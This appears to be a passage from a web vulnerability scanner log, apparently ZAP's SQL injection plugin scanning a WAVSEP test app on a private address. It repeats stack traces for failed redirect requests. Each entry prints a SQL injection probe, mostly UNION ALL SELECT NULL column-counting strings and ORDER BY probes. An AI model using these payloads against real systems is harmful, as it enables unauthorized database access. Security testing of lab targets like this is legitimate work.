http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 3891-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679715 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679716 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679717 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679719 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679720 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679721 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679722 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679722 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679723 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679724 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 5913-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 5913-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not 